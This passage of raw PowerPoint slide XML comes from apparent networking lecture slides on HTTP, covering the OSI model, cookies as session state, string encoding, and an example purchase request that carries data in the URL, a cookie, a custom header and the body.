            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 0.9/1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wrap up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2594156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OSI ISO Network Model</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4662985" y="1600200"/>
            <a:ext cx="5852614" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Talked about how reality does not match the model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Session layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Presentation layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… they don’t exist in the socket API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But they do exist in HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies enable persistent storage of per client state, i.e., sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP standardizes on string-encoding all data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708492" y="2088137"/>
            <a:ext cx="2258720" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681070" y="2088137"/>
            <a:ext cx="2231550"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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697252" y="2663625"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00206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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669694" y="2663625"/>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fontScale="925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Presentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="3236802"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="3236802"/>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Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="3809979"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="3809979"/>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Transport</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="4383156"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D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a:xfrm>
            <a:off x="1669825" y="4383156"/>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Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="4960890"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="4960890"/>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Data Link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697514" y="5534067"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF000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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669956" y="5534067"/>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Physical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3763090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OSI ISO Network Model</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5168387" y="5155859"/>
            <a:ext cx="5852614" cy="1171533"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies enable persistent storage of per client state, i.e., sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708492" y="2088137"/>
            <a:ext cx="2258720" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681070" y="2088137"/>
            <a:ext cx="2231550"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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697252" y="2663625"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00206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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669694" y="2663625"/>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fontScale="925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Presentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="3236802"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="3236802"/>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Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="3809979"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="3809979"/>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Transport</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="4383156"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D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a:xfrm>
            <a:off x="1669825" y="4383156"/>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Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="4960890"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="4960890"/>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Data Link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697514" y="5534067"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF000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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669956" y="5534067"/>
            <a:ext cx="2242654" cy="57317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Physical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84231DEE-132B-D4E2-F177-FB5F4DD1F599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5168387" y="1756738"/>
            <a:ext cx="6820413" cy="2743449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr">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HTTP forces all data types to be string-encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standardized data formats like URL-encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accept header tells the server what kind of data the client accepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type header communicates data format to the client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A7EC932-7C28-B57F-39BB-E95DE87F9544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4098044" y="3523390"/>
            <a:ext cx="1220796" cy="16901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FDE790B-AEBF-EF75-301E-A62FCE5741CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4098044" y="2950213"/>
            <a:ext cx="603217" cy="1137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Left Brace 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07227BAE-5880-FFFD-376A-F66FACAF94B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825734" y="2044235"/>
            <a:ext cx="342653" cy="206817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59629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Sending Data Over HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="1561269"/>
            <a:ext cx="11785600" cy="2636680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At least four ways to send data to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embedded in the URL (typically URL encoded, but not always)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In cookies (cookie encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a custom HTTP request header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the HTTP request body (e.g., form-encoded)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696027" y="4275810"/>
            <a:ext cx="10940716" cy="25821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ptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>purchase.html?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=399.99#shopping_cart HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>… other headers…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie: user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; item=iPad; price=399.99;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-My-Header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/iPad/399.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=399.99</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536880" y="4792123"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60833"/>
              <a:gd name="adj2" fmla="val -1165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6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6713623" y="5026588"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -8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7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927078" y="5388210"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -8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8" name="Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229433" y="6126600"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -8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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377065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8ACC5-6265-C1D2-7FD0-EBC892F3FFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Long Live HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05428FBC-4CED-B480-D477-DE0980966D63}"/>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DE0661-4C1A-839F-E4F7-261B27A5B096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP offers a simple client/server request/response messaging model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
